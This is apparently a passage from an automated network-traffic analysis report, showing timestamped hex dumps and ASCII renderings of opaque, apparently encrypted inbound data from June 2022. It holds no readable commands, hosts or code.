42 0d b6 e6 ab 62 97 4e ec 15 bc e1 ed 30 f8 c2 e6 5c d1 cd d1 d8 7a 1d 03 ee 45 f1 92 da 61 3a 10 35 2f 6e f7 e2 85 8e 67 ea c6 50 43 f2 0b 1b df 72 16 a3 44 82 41 94 3b 4e dd 21 06 9a c1 e2
                                                                                                                          Data Ascii: ]ZvzJZ<`ijX@f8tGw,y;Ej?UUX#Y%Tb(E;?nfB@O=J506=C;'y15Ql|eX^<sa8#Z#?AbtLRBbN0\zEa:5/ngPCrDA;N!
                                                                                                                          2022-06-14 11:50:17 UTC104INData Raw: 13 80 8b d2 43 e9 ea e4 c1 82 56 eb 15 7b 79 fe d9 84 9c f4 88 85 9f 62 aa 05 78 fe 32 fb 3f 6f 22 fa aa 17 02 6a bf e3 a6 ac e6 26 ed 9e cd 8d 8e 96 ee 17 9e 77 bf 7f e7 d3 38 61 ab e3 c8 e2 ef 70 cf 96 1f 59 86 64 78 c0 cb 07 f3 55 42 41 b0 77 d8 66 34 61 1a fa b6 df f7 18 42 12 b4 59 f7 eb ee 09 20 5d 74 a8 3a 4d 0b c9 c3 32 df 5e 64 84 03 4b 4b d0 66 60 0b e8 6d 2c f9 05 ca 4d 7a c7 6c 5d 6c 1d 2d 38 09 bf 37 9d 3c 90 c4 78 3e b5 80 e6 6d 7a 4c 75 e5 03 cd f1 f7 63 33 ce 02 75 eb 7c 83 d5 f8 ce fc 69 6d f0 b0 b9 10 9c 0f 25 5f 97 86 31 09 f0 9e 39 09 a5 1f c4 28 af ba dd 7c 3a 13 ab b8 06 d8 bd 13 bc 32 de 03 10 02 9b 9c 11 6f 2f 49 45 dd ce ec 8a c5 8a 39 7e f7 4a db 51 3e b5 92 a2 54 c5 c6 87 6e c9 cd 54 62 13 45 ff 69 71 be a1 24 55 56 a6 7e 4e d1
                                                                                                                          Data Ascii: CV{ybx2?o"j&w8apYdxUBAwf4aBY ]t:M2^dKKf`m,Mzl]l-87<x>mzLuc3u|im%_19(|:2o/IE9~JQ>TnTbEiq$UV~N
                                                                                                                          2022-06-14 11:50:17 UTC105INData Raw: 13 35 00 8b 3d 3a 3e a4 f3 4f 10 6b ec a6 6f 10 c3 03 d7 98 43 19 54 16 ac f4 60 75 96 58 f1 4d 06 ea fc 31 e8 d5 ff 42 cd b2 d0 d8 7a 11 14 d7 d3 9c ea d0 ff 21 13 f3 ba 6c f8 df 89 88 b6 96 90 41 48 e9 c7 f4 30 6a 9e 38 54 49 50 2d eb 1f dd 2b db 57 e2 e2 90 79 49 54 0d 2a 44 35 14 ce b8 3f e9 d9 c8 e1 23 c5 2c 2b 52 b7 84 8e 13 02 5c 98 7d cb f9 42 35 5a cd 27 22 36 92 7d d7 14 cf e9 9d a5 c3 3b 99 70 48 37 39 56 c7 e0 3a 5c ed 03 32 21 51 f3 0a fe 23 49 40 a4 89 fb 7d bd 6f 64 31 9d 43 58 b1 a6 23 c2 c2 cc 68 f7 b1 68 b7 a5 89 af 2d 38 58 1f ff 49 d6 cc b0 d9 16 42 3e 2f f6 e6 1b ce df c9 4c 9e fc 93 29 2a a8 c6 79 e5 ea 02 45 cc ad 05 3d b0 59 34 d5 4e 95 e1 a5 fe b9 1c ee c3 00 cb 33 5c 32 24 91 22 89 98 38 d9 79 aa 9c 1d b6 80 f9 5c 9e e7 ea cd a4
                                                                                                                          Data Ascii: 5=:>OkoCT`uXM1Bz!lAH0j8TIP-+WyIT*D5?#,+R\}B5Z'"6};pH79V:\2!Q#I@}od1CX#hh-8XIB>/L)*yE=Y4N3\2$"8y\
                                                                                                                          2022-06-14 11:50:17 UTC106INData Raw: b7 ee dc b3 a1 1c f5 93 32 7b 02 78 30 25 ec a7 b6 0b 85 8a c0 36 51 a4 90 e2 17 36 16 e3 f9 27 5d 64 4f 57 fe 85 1a 28 80 b3 64 f3 b4 69 c2 dd 3f ec 95 b8 3e 09 5f 7f 40 d9 79 9b d1 0e a2 1b 1e c6 87 64 dd e4 46 d3 24 15 e8 bf fc 8e f2 b8 52 7a 2e 68 60 d9 d9 bb cc a5 19 48 b0 91 a3 86 bf 7b 92 97 a7 17 0f 42 65 4f fa 1e 6e fb 11 a3 4b 51 5c 42 b4 6c 4a 57 e8 de b2 b2 0d 21 13 81 8c 4e 57 b9 40 9a ef 78 4b e2 93 fa 8b ef 5f 79 c9 1a 2d 29 3a 5c 47 3c d9 9a 5d 42 7e 69 d0 c5 01 b6 d5 78 64 77 70 e3 fc 12 8f 3e af d0 60 8f b2 c0 99 7b cd ec 09 93 46 e1 69 87 a8 46 b4 90 16 9e 79 d2 71 07 21 4b 61 72 85 a1 13 47 ee 64 23 6f ef 07 93 b2 fa fc 25 d9 bc 48 17 ae 2a 84 8f b2 e1 e2 54 27 94 c1 5d 1d d9 41 da 2a 1e 3b ca cd fb 81 64 55 b7 9a 02 72 28 b6 ce 75 ca
                                                                                                                          Data Ascii: 2{x0%6Q6']dOW(di?>_@ydF$Rz.h`H{BeOnKQ\BlJW!NW@xK_y-):\G<]B~ixdwp>`{FiFyq!KarGd#o%H*T']A*;dUr(u
                                                                                                                          2022-06-14 11:50:17 UTC108INData Raw: c2 c8 d9 78 56 dd 7b a8 a9 99 be 3e 08 84 68 a8 8c 1f c6 b7 cf 11 2d 86 3d c6 e8 0c 92 cc da 5f 66 c4 7c 38 3c a5 f9 13 e9 85 b2 44 c5 bc d3 ed 98 7c 34 d5 4e 60 e0 a5 fe b8 f5 f2 1c a5 36 37 5c 35 40 c8 25 9f 95 b1 7f 1a f8 2d 1c bc 8d 5f 38 b4 b2 f8 f1 90 c1 48 51 db d3 cd 21 b4 9c 67 38 91 79 6c 21 b6 54 be ea eb 1c 30 a6 b3 28 8d 73 ad 39 d0 2d df 10 41 98 fb 9b 68 13 41 9f 68 c1 a6 10 6e 8f 76 30 ef 38 20 7c 17 56 dc 79 8b 44 64 ce e2 f9 80 62 a3 89 13 b7 80 c4 70 d5 e2 cc 16 93 56 ed 7a 3d 79 fe d2 90 bd fc e7 81 9e 62 a0 dd a0 fa 23 eb 3a 43 2a 5a aa 1d 14 59 a5 ee 95 8b e3 0a f5 f6 94 85 96 f3 e1 07 92 12 10 6e cf 04 11 bb a5 cb 98 f6 c7 4a a0 20 14 4f bf 49 6d fb 14 03 e2 57 30 e4 b1 5b d5 46 e1 54 cc e2 a2 ca fb 66 f6 0b 4a 52 b4 9f ee 66 2d 49
                                                                                                                          Data Ascii: xV{>h-=_f|8<D|4N`67\5@%-_8HQ!g8yl!T0(s9-AhAhnv08 |VyDdbpVz=yb#:C*ZYnJ OImW0[FTfJRf-I
                                                                                                                          2022-06-14 11:50:17 UTC109INData Raw: c0 80 3e ae ee 55 8a 9e c4 95 58 b6 eb 11 6b 28 8c 6a ac ac 72 5a 80 0a f4 37 ce 0c 07 21 4d 62 6a 85 9a 17 56 95 7b 2c 91 12 2b 9f aa fd e8 4e 35 f9 48 0c b5 2d 69 85 9e f3 f1 58 29 6a d1 75 0d 1f 0c f7 2c 08 4e eb c4 e3 85 75 4f ae 7c fd 5f 02 be d9 62 2a 8a 8c 30 f3 83 94 1e 27 5c 9d 0e 8b 54 d2 8d cf 35 ad 15 b1 d2 d0 91 c3 a8 91 2b 6c d9 39 9e 2c b8 8f 41 19 67 5b 9a b9 82 e3 d7 72 9e d8 dd e7 d6 8b d5 ce c5 38 d1 88 77 59 9d 53 85 dc 34 b5 f7 b1 19 24 b2 d1 a0 2e 00 30 ac ed 45 12 6b 1b ae 00 06 d7 10 d2 cf ae 17 54 1c bf e0 7e 6e 92 a3 e6 12 91 f9 f4 13 ea d3 ee 4e ad c3 cf ce 63 0d 13 d7 db ec da 2e fe 07 11 15 9c 78 ff f3 91 d0 a2 f6 cd 50 47 fc 59 d4 04 57 ab 16 50 2b fd 40 b6 15 c4 4b 74 25 c7 f3 9e 7d e3 47 09 4f 31 9b 16 c4 6e f9 9f 32 e1 cc
                                                                                                                          Data Ascii: >UXk(jrZ7!MbjV{,+N5H-iX)ju,NuO|_b*0'\T5+l9,Ag[r8wYS4$.0EkT~nNc.xPGYWP+@Kt%}GO1n2
                                                                                                                          2022-06-14 11:50:17 UTC110INData Raw: d7 97 bd ff 97 09 61 63 86 fc 40 ad dd 12 d3 74 23 49 a5 17 13 65 b1 e8 43 53 cb 19 f1 9f 4b ea 5d f8 e6 10 12 2c a0 6f ce 1d 31 7e b1 d8 91 e0 fe 75 bf 0b e0 58 a0 63 66 a8 8f 06 e2 55 2c 14 b3 5b d5 77 57 23 60 e6 a5 d1 df b8 44 0a 40 4e 9b f9 ef 66 27 43 58 b1 2d 16 69 39 dc 79 2b 54 51 9a 16 47 4b da 41 b7 08 c4 63 25 b7 79 c2 4c 6b c2 6b 8b 9f 10 1b 1a 0f bc 55 32 22 6e cf 4a 53 ce 34 32 61 6d 77 dc e7 12 c3 fa 0d 7a c7 b8 9a c6 f0 65 af 78 eb ca e1 bf c2 de b3 ab 1b f7 c1 35 5b 87 72 2f 28 e0 86 2a 1c aa 11 e5 c8 50 97 ee 7c 6a 56 92 e3 fd 54 e9 16 d3 5b a0 ac 18 28 8a 84 a5 6d b2 43 53 9d 37 e9 8a d4 bd 29 6c f8 40 c8 76 9b 8f 6c a5 17 9e fe 04 99 3d 35 c5 e9 17 90 e8 ae f3 8e b2 da 55 76 88 6e ec 7e c6 da 51 b2 3f c2 3c 36 a3 99 d8 cf 6c b7 2a 1d
                                                                                                                          Data Ascii: ac@t#IeCSK],o1~uXcfU,[wW#`D@Nf'CX-i9y+TQGKAc%yLkkU2"nJS42amwzex5[r/(*P|jVT[(mCS7)l@vl=5Uvn~Q?<6l*
                                                                                                                          2022-06-14 11:50:17 UTC111INData Raw: c1 09 f5 42 cf 1b 5e 73 70 f0 71 77 98 10 f4 31 9c f9 f3 2c 05 d2 c2 47 a6 d6 df d8 61 0d 0c cd 2a f2 be d9 c7 59 1a 2d f9 62 f3 e0 81 99 a0 f6 d2 66 b6 e2 37 23 3d 7e 66 eb ac 47 7e 51 b9 1f cc 2e 1a 77 c4 df bb 57 4c 3e 48 44 19 31 60 46 64 e1 f1 fe 9b 8d 22 c5 22 b6 ed 98 7c 99 c5 85 d9 92 75 e5 d7 cc 58 b6 c6 53 00 ea 95 4c aa 55 ce e8 d9 bb d0 36 99 e7 47 25 57 57 e7 f0 38 27 d3 00 32 58 52 56 05 e1 22 7a 1c bd 9a f6 7d 8b 60 fe 90 63 4e 74 ac a5 50 69 c0 c8 62 5e 6f 02 cb 14 8b af 26 12 e9 19 ff 86 09 f7 ee 23 e9 bd 21 32 d5 ed 1b 59 d0 d6 64 94 fd bf 19 3e de be 03 e5 ee 71 ee c7 b6 f1 24 f6 0f 9e c1 66 5a c8 14 f6 ae cc ef 55 cb 1e cc a3 2c 06 80 2a 9f 8e b9 71 57 69 9c 31 af 85 0c d5 b1 b2 fa e4 3c 60 53 11 22 c4 fe 2a a2 f6 a0 33 91 6e 0c 65 a7
                                                                                                                          Data Ascii: B^spqw1,Ga*Y-bf7#=~fG~Q.wWL>HD1`Fd""|uXSLU6G%WW8'2XRV"z}`cNtPib^o&#!2Yd>q$fZU,*qWi1<`S"*3ne
                                                                                                                          2022-06-14 11:50:17 UTC113INData Raw: 3b 0a 8d ed c0 36 5b ac 27 f3 48 16 93 e1 d1 a1 40 14 d9 25 f4 03 1a 33 93 a9 05 66 a5 c5 14 dd 3f ed a2 27 a2 0f 75 e4 4c db 68 88 9c 71 a4 3b 9d a9 4c 65 c2 cc 56 84 04 9f e9 ac f5 80 a4 35 53 72 46 68 60 d3 49 83 50 a3 3b c6 a1 9d 8b 7a d9 e7 9e a6 23 3f ec 42 7a 24 09 d4 4f 75 17 de 0d 4f 2e da a3 49 d4 50 c0 3d ad db 9b a8 ca bc 8d 4c 28 d5 5f 89 db 60 42 6e ac 6f 8b 1a 5f 7b c9 09 2f 25 2a 68 46 3c d3 15 15 49 61 67 55 82 2c a9 c0 10 af 67 78 7f f8 e5 9a 3b b8 ff 83 68 b2 c6 88 dc ef ec 09 97 38 a5 79 80 86 ba b9 83 17 11 31 d9 66 fb 5b 21 63 6a 92 b5 1e 3c 3f 17 0f 91 ee 2b 9f bb eb fb 0a 45 95 7e 1d b1 30 2e f9 f7 f1 e9 4f 06 06 d1 74 05 e6 25 38 2a 1e 2e 4e 87 f0 81 77 4f af 75 04 76 cd b0 dd 76 5b d1 88 26 0f f9 b2 33 3d 41 91 06 e1 9f ba b8 31
                                                                                                                          Data Ascii: ;6['H@%3f?'uLhq;LeV5SrFh`IP;z#?Bz$OuO.IP=L(_`Bno_{/%*hF<IagU,gx;h8y1f[!cj<?+E~0.Ot%8*.NwOuvv[&3=A1
                                                                                                                          2022-06-14 11:50:17 UTC113INData Raw: b0 9e d7 55 77 bf b6 49 5a de 69 de 07 c5 63 3a f9 11 8e 4d 7a c9 7d 96 67 c7 b8 71 0d bf 24 e2 68 6f c5 50 28 b0 b0 82 63 67 55 73 9e 2c c8 eb 0d 65 6c 60 2b c4 fa 7e 8f a6 45 c8 eb 9d 44 71 b1 a1 09 89 0b 47 e8 83 78 3a 0d 5e 8b 2a 07 8d a0 c2 36 5b aa f4 6f 1c 99 ca e3 f9 25 39 51 d2 51 da b4 75 fe 80 ac 1e cd 8a e6 45 dd 3f ee f1 97 a3 0f 7b fe 51 df af 0b ee 92 a4 39 ec 8e 86 64 c6 db d7 fd 32 9e e8 b5 fe ea 9f 25 54 5e a2 1b cb db c6 d0 41 ab 4a 68 b2 91 a9 b1 74 e5 94 bd 3b 13 7c f1 78 2e 6c 30 e3 77 11 a9 63 e0 2c de b8 5d c0 46 e5 51 f4 db 91 25 e8 f9 8c 4e 57 24 31 5f df 7f 41 a6 b9 ae 89 61 1c 78 d8 08 37 33 04 5d c9 66 d9 9a 4e 32 29 64 2e c0 3c a4 c6 78 11 cd 7a 79 de c9 83 4d 05 fa ab 81 9a 6b 80 53 bc fd 0d e6 9a a2 68 8d 86 f4 bb 83 17 b6
                                                                                                                          Data Ascii: UwIZic:Mz}gq$hoP(cgUs,el`+~EDqGx:^*6[o%9QQuE?{Q9d2%T^AJht;|x.l0wc,]FQ%NW$1_Aax73]fN2)d.<xzyMkSh
                                                                                                                          2022-06-14 11:50:17 UTC115INData Raw: aa 84 b1 0e 93 96 ef f3 d7 aa 5e b6 ca 30 a5 ed 95 57 d6 07 c5 f9 d7 b3 eb d8 9d f6 4e 9f b8 5c df f4 2e 74 75 01 32 56 47 5e c5 fe 2f 48 56 8c fa fb 7d 90 43 e3 b6 d8 4d 5a ca e2 22 c2 c6 bc ea 41 0b 69 a9 bc 9e 79 a1 22 58 1b fe a4 99 ce ba d3 62 65 3e 3c dd 9f 5f 49 df cd 4e 11 b8 92 38 38 b4 fa 04 f4 ee 98 6d 62 b6 fb 36 3e 6d 36 d4 b0 43 e4 b4 f0 bf ce c7 58 73 1b cc 5e 31 54 d2 24 9f 9b b1 e1 4d 97 9d 1f c7 ca 76 eb b4 a5 94 3d ba 8a 77 50 d1 c1 90 f2 07 db 63 3d 91 79 29 69 86 56 b4 c7 fa 10 5f 10 b2 28 96 4d 57 10 cb 2b ce 2f 8f 99 d7 93 66 2b 4a 91 56 ea a3 3c 6a f7 26 30 e8 2a d9 6c 37 3b 47 7a a0 ad 4e 63 a5 f8 86 70 05 0e 39 b7 8a c1 73 dd eb 91 c1 97 56 e3 15 66 68 e8 d3 bc f7 f0 8f 28 61 63 86 f1 6c d4 39 e6 2c 6c 02 a4 ab 3b 0f 69 ac 9c fe
                                                                                                                          Data Ascii: ^0WN\.tu2VG^/HV}CMZ"Aiy"Xbe><_IN88mb6>m6CXs^1T$Mv=wPc=y)iV_(MW+/f+JV<j&0*l7;GzNcp9sVfh(acl9,l;i
                                                                                                                          2022-06-14 11:50:17 UTC116INData Raw: 4e 75 1b 23 1e 4f 2e da cc 03 c4 57 ec f6 f2 d8 91 21 bb 9f 8d 4e 59 13 08 88 df 7b 35 4b 93 fa 8f 32 0c 7a d8 0a 16 01 02 8b 4c bc 8e 9b 4c 4d 1f 2a 2f c4 29 81 8f 7c 62 60 50 5a d4 d8 81 be f1 f9 ab 8f cc 89 83 53 b2 c4 44 96 29 a6 40 a4 ae 59 b3 03 44 9f 68 dd 18 b6 21 67 66 42 cf a9 13 50 cd 58 2c 91 e4 ab c5 ba eb ff 34 51 bc 48 19 99 61 94 84 b4 d8 ca 4b 2d 60 40 2a 15 e1 09 f1 39 2e 26 c1 f6 f0 81 75 56 aa 64 12 48 25 9b c6 7c d3 9f 76 27 21 80 ec 39 3d 42 98 f4 8a 69 d4 8c 3a 34 86 0e 58 c0 f8 93 f9 ae a0 36 6f 8e 67 b4 2e 97 1f 75 71 6f 30 c2 af 58 ea f1 59 8a df d0 b5 d6 f0 c3 cf c5 3c d1 81 a1 d9 e5 38 a5 cf 23 64 ec 47 11 39 58 ce 81 3d 37 20 52 9d 65 10 7c ed ae 07 0f 3f 02 f1 f5 e6 19 7f ff bd 8a 2c 70 87 59 cd 1c 9e eb 81 66 fa d3 ea 6e be
                                                                                                                          Data Ascii: Nu#O.W!NY{5K2zLLM*/)|b`PZSD)@YDh!gfBPX,4QHaK-`@*9.&uVdH%|v'!9=Bi:4X6og.uqo0XY<8#dG9X=7 Re|?,pYfn
                                                                                                                          2022-06-14 11:50:17 UTC117INData Raw: 05 b7 28 96 5e 44 c5 d1 07 c7 3a 1e 9f fa 91 74 38 17 80 6e 0e bb 03 6d e0 3c 35 f9 cc 26 41 18 2e 7f 7d 8b 5f 49 02 18 f8 aa 76 a0 bb 38 0c 88 bd 44 df eb ee ad b4 56 eb 15 66 79 fe d8 d7 f7 d3 88 31 9f 62 aa f5 88 c1 7a c5 1a 6b 1a 50 1d 00 d4 e7 81 e7 bd 53 ec 1c f4 17 78 92 4c ea e2 1b b5 5f a2 66 d7 d6 21 0e a9 ca 9e ea e3 7d a9 28 3e 5a 8e 42 64 fb e8 06 e2 5b 77 95 b0 5b d5 f2 34 47 1a e9 ac ca f3 38 9f 0d 60 58 c8 ca ef 66 98 5c 74 a2 24 17 78 27 d5 21 d0 6d d6 97 07 4b 5a c5 7a 86 f4 c5 4f 33 88 0b cd 4c 70 c6 6d 94 64 11 26 2e 17 41 27 b5 25 78 c8 4f 2a b8 98 21 64 70 a1 70 c9 11 d1 f8 0c 62 0e ce 34 3a f1 43 92 d2 c1 cf e8 97 6a d4 3f 8e 03 98 0e 5b ac 80 78 3a 03 ed 9a 2f 0d b4 0b dc c8 50 97 f9 6f 15 1f 02 ef e4 34 47 14 c2 54 c1 0a e4 29 ac
                                                                                                                          Data Ascii: (^D:t8nm<5&A.}_Iv8DVfy1bzkPSxL_f!}(>ZBd[w[4G8`Xf\t$x'!mKZzO3Lpmd&.A'%xO*!dppb4:Cj?[x:/Po4GT)
                                                                                                                          2022-06-14 11:50:17 UTC118INData Raw: 80 cc ba a3 25 69 f5 3d 17 3f 8d 21 43 67 44 d5 9e ae 52 ff dc 4d a2 0f c1 85 d2 e7 66 c8 c5 3c d3 93 be d9 ec 25 a6 25 27 63 fd 1b 01 0a 4e c2 9e 15 a8 36 ac 96 61 b8 69 e6 a4 28 db c1 03 d7 ce 00 1a 54 1c b6 e5 59 ba 84 5d e1 29 11 ef fc 3b fa c0 ce 55 9e d3 c6 54 21 02 13 c7 76 e2 b2 c4 eb 3f 30 b5 f9 7d f5 e7 a6 52 b2 f9 cb 56 c5 e4 1b 2a 04 68 b9 05 72 4e 40 ce e7 1f dd 20 a5 98 e4 e7 80 41 66 dd 09 45 13 21 3c 0f 67 e1 f6 eb 6d cb 23 c5 27 2b 78 8e 88 98 04 84 d3 92 75 e6 5d 5b 78 a2 d8 33 00 72 95 57 dd 00 e7 23 de a5 c5 2e 14 f1 48 3d a8 45 e8 f1 19 4a fb 8d 63 5c 51 d3 36 ef 0c 5d 54 b0 a1 61 7d 9a 65 f5 b5 51 4c 58 b7 b0 ae c5 c2 c8 69 55 1f 7c 90 20 89 af 26 12 49 1b ff 86 0c c0 b3 cd 3e 89 3d 3c c0 f5 96 4f df c9 4d 79 df 82 1b 2a b3 72 53 e5
                                                                                                                          Data Ascii: %i=?!CgDRMf<%%'cN6ai(TY]);UT!v?0}RV*hrN@ AfE!<gm#'+xu][x3rW#.H=EJc\Q6]Ta}eQLXiU| &I>=<OMy*rS
                                                                                                                          2022-06-14 11:50:17 UTC120INData Raw: fb 60 e5 77 7a cd 7e be a8 13 37 2b 1b 32 09 99 20 6f d6 4f 3b 95 6a 34 61 61 77 52 e5 12 c3 98 d7 63 1f cd 3a d0 e1 7b e8 09 e8 ca ed f8 a0 de b3 ab 10 bd 37 3a 5a 81 78 22 00 db 44 28 0d af 82 ed 36 51 a0 e2 62 00 0a 87 cb 06 25 42 12 c5 dc d9 03 1a 29 94 b8 00 47 2a 49 45 d7 17 1f 8e d4 a4 19 57 39 42 d9 73 95 a8 86 8c c4 95 c6 81 72 4f cd da d5 05 8b fc ab d4 09 a1 24 5e 72 51 6c 60 df d0 f2 9e a1 39 ce 98 5e a1 99 d3 f6 88 a3 02 e8 0d 42 7c 38 eb 1f 4e 75 10 b7 5f 5a 06 46 b2 4c cf 7f 1d da ad dd 87 0f 5d be 8d 44 7b 5c 5c 89 d5 57 87 04 92 f0 a7 07 4e 65 cc 24 84 26 02 8d 50 b1 de 9a 4c 48 75 71 3a ec b5 a9 c4 75 4a c1 78 79 de cb 91 2f b5 ec 83 74 b0 c6 84 45 3b eb 09 95 28 b4 7c 93 86 c1 b9 83 17 b6 9b dd 66 ff 36 4f 11 68 96 a0 3f 1a f4 67 38 b9
                                                                                                                          Data Ascii: `wz~7+2 oO;j4aawRc:{7:Zx"D(6Qb%B)G*IEW9BsrO$^rQl`9^B|8Nu_ZFL]D{\\WNe$&PLHuq:uJxy/tE;(|f6Oh?g8
                                                                                                                          2022-06-14 11:50:17 UTC121INData Raw: e6 42 d5 14 c5 e2 c4 b6 d4 39 88 e1 57 22 57 57 e7 c3 2b 51 82 1c 33 5c 57 c4 fb 0b 2e 49 4a cb 94 f8 7d 9c 77 8e 68 9c 4f 52 de b9 22 c2 c4 db 66 5e 2b 7b af b8 98 b8 33 37 a6 1a d3 9b 0e c9 92 2f 12 42 38 14 e5 e2 1b 42 f7 86 4c 6a f6 80 30 23 ab ed 15 e5 fb 15 5a ce 48 fa 10 91 6d 37 eb 8c 51 e0 a3 d9 79 d9 f5 06 9a e4 22 4b 2c 23 6d 24 b3 96 8e eb 14 97 9d 02 b1 94 60 eb a1 a5 e1 c2 46 f0 64 5d c0 d5 fd 45 fe b5 b3 3a 8e 59 10 6d b6 45 a3 f2 d0 ee 5e 3a bd 39 93 4a 49 b5 67 14 14 38 71 98 e4 ba 6d 37 4a 87 57 0b 82 ee 69 cc 39 21 e1 4c 79 6c 1b 3d 7d 77 a3 5b 4d 18 e0 ea 8d 6b aa aa 04 b7 9b c5 5c cf 15 e5 ed 85 40 fa 1c 09 36 fc d8 9d bb 2a 9b 27 8c 68 b5 e7 6b e9 23 fc 3b 74 08 a4 ab 3b 0b 52 90 e5 bd 52 f8 19 e0 8e cf 94 81 e6 f2 e8 9f 51 81 7e c6
                                                                                                                          Data Ascii: B9W"WW+Q3\W.IJ}whOR"f^+{37/B8BLj0#ZHm7Qy"K,#m$`Fd]E:YmE^:9JIg8qm7JWi9!Lyl=}w[Mk\@6*'hk#;t;RRQ~
                                                                                                                          2022-06-14 11:50:17 UTC122INData Raw: 84 26 93 ba 9e 45 20 a8 5f 89 d9 6c 5b 15 82 f2 e4 5b 5e 79 de 1d 2e 33 0e a3 be 38 d9 9c 64 b3 60 65 28 ec ff ab c4 75 0d 5b 79 79 d2 c9 9b 2f a2 d0 53 8f b2 c0 aa a9 b7 ec 0f bd fb a2 68 8d c1 66 b8 83 1b 8f 78 da 09 ba 21 67 64 6c 87 ba 7c 91 e4 7b 26 4f e1 0e b7 96 eb fb 40 0d a9 60 33 b1 3a 9d 5a b2 e1 e3 5c fb 79 ca 60 1e f0 1a e5 5f e0 db 3e cf e5 96 a3 4d bf 75 16 4f 38 3e 6a 43 3f 75 77 d9 0b a8 f4 73 09 45 8e 0a 8b 45 d6 c8 31 34 81 1d a6 c1 d4 cf d2 ac 8b c7 6d f5 3b a8 2e 93 34 57 73 6c 4d 03 ae 58 ee b6 58 8a df c9 87 d4 f0 e4 cf c5 3c cf 80 a1 c9 c5 31 f0 c5 22 63 f1 ae 38 c6 58 d6 80 17 30 36 bf ac 4b 12 59 e6 ae 00 12 c1 03 cc e1 c6 30 4f 1c b8 e6 8f 70 ab 5f ff 35 9c ef ea c5 fa ff ec 53 b5 c5 d7 c0 8e 03 3f c4 ff f1 b9 33 fd 50 cc 2f f9
                                                                                                                          Data Ascii: &E _l[[^y.38d`e(u[yy/Shfx!gdl|{&O@`3:Z\y`_>MuO8>jC?uwsEE14m;.4WslMXX<1"c8X06KY0Op_5S?3P/
                                                                                                                          2022-06-14 11:50:17 UTC124INData Raw: 20 4c bc 2e 6a c3 11 68 e4 32 21 75 17 0a 62 3d 26 7d 58 05 4f 4c 18 f9 da ae 8d 8a b9 15 9d e4 ac 22 df eb e0 de 85 cc ce 38 69 5f e1 ca b7 1d f1 88 31 80 41 82 0c 79 fe 25 c7 42 15 7b 5b aa 13 1d 79 34 c2 90 5d c1 15 e0 b9 1b 84 96 f9 f9 35 b6 84 a1 6f c9 24 57 1f c0 ca 9e e4 f0 6e 3a 05 33 56 aa 5d 70 f3 38 06 e2 51 40 9d 99 a2 de 6e 3b 7a a2 9a c4 da f7 0d 59 1f d0 7d f6 f5 ca 79 32 7c 6d a0 22 16 67 14 eb cb d4 55 7b bd 69 35 3b d5 7f 9a 15 d2 f9 1f d6 65 eb 53 6c ed 4f 85 61 11 28 08 25 46 27 99 26 44 ab 2a 58 bc 98 34 7e 70 c5 54 c8 1d ef f4 1e 42 41 c9 29 c4 ef 4a af 2c e8 ca ed bd 02 a2 d2 a0 03 9c 10 2c c1 a4 55 3f 03 ec 91 0a 8e a7 0e c0 29 77 93 08 7f 11 10 b9 8d 87 46 43 14 d7 4e c7 99 3f 05 8f 8a 0b 76 92 e0 47 dd 3f f3 ad fc 5b 0e 7f f1 6a
                                                                                                                          Data Ascii: L.jh2!ub=&}XOL"8i_1Ay%B{[y4]5o$Wn:3V]p8Q@n;zY}y2|m"gU{i5;eSlOa(%F'&D*X4~pTBA)J,,U?)wFCN?vG?[j
                                                                                                                          2022-06-14 11:50:17 UTC125INData Raw: 9e a8 72 84 a5 38 8b df c7 9a 94 6a ce e2 cb 1a cd c0 81 73 f6 33 8e cd 0b 9a fa b9 16 3f 34 a8 eb 3c 30 32 b3 dd d3 37 46 e9 88 1f 56 e1 bd d8 f7 cd 04 48 34 46 f0 71 77 ad 33 99 5f 9d e8 f8 24 b9 49 cb 69 b1 e3 cf 9a 50 d8 16 c6 d4 ec 98 f8 06 2a 18 2b d3 13 81 92 8f 99 b5 e6 8e db 6d ce 14 0c 1a 38 b8 f0 56 58 56 5d bc 37 24 20 07 8f ef 9d ea 34 4f 45 0d 5a 5d af 31 e9 6b c7 ef b8 c0 22 26 c5 26 27 48 b7 53 8f 13 0e a8 fc 0b 86 fe 4a 5e a9 89 bd 0d c7 9a 71 c8 51 ef e8 db a5 c3 26 8a de b1 3c a9 50 e1 8a 44 3d ec 01 36 43 17 48 b1 d3 21 6f 5f e2 a9 ea 7b 9a 6f f9 b5 64 4e 58 b7 8c 49 bc a3 c9 68 45 14 2f 22 9d a4 a1 0a 25 1f 3b ea 8a 1f cc a7 f1 ef 43 3e 3a ec 8c 65 29 de c9 48 75 b4 09 1d 11 aa d8 1d ad ca 1e 43 c5 b6 e4 2d b4 85 33 c3 60 7a 8a db 95
                                                                                                                          Data Ascii: r8js3?4<027FVH4Fqw3_$IiP*+m8VXV]7$ 4OEZ]1k"&&'HSJ^qQ&<PD=6CH!o_{odNXIhE/"%;C>:e)HuC-3`z
                                                                                                                          2022-06-14 11:50:17 UTC126INData Raw: 3f 01 e5 b1 3e bd 98 2b 49 9e 5e 71 e3 38 a7 95 68 63 1f cf 36 b4 6a 4a aa da cf d5 9b b7 86 db b3 a1 1c 8b 27 cd 5a 81 7e 1a 4b 8d e8 2b 0d a1 11 b1 ac 74 96 fe 58 0e 67 b3 1e fe 27 42 0b d9 79 27 02 1a 2e aa c2 6a 0e b3 49 41 c2 4d 76 af f9 ad 29 60 85 60 de 71 84 b4 8d ae 13 6e c7 87 62 e8 a0 a4 b4 05 9f ec a0 8f 0b 84 09 5a 7c ba 1b 40 c8 ce da 50 bd 11 3d b1 91 a5 b3 b3 99 f5 b6 2a 13 10 36 e0 0b 4b 16 68 6a 65 83 52 46 2e de aa 64 3c 56 e8 d8 87 b1 ef 46 92 bc 89 51 26 09 7b a4 d1 59 54 71 b2 e1 83 1a 5f 60 f0 f5 3f 22 04 a1 2c 42 b8 9b 4c 4d 7e 13 b4 e1 00 a7 e2 60 14 46 66 71 d4 d8 90 16 50 f9 ab 8d 98 ac fc 32 b7 ec 0d 8a 5e 3a 4d aa a0 7f a6 f4 3d bd 60 d9 66 e5 08 9e 63 6a 90 80 79 28 84 7a 2c 95 f1 53 05 9e c6 f5 6c 01 c5 68 34 b9 3a 97 99 9a
                                                                                                                          Data Ascii: ?>+I^q8hc6jJ'Z~K+tXg'By'.jIAMv)``qnbZ|@P=*6KhjeRF.d<VFQ&{YTq_`?",BLM~`FfqP2^:M=`fcjy(z,Slh4:
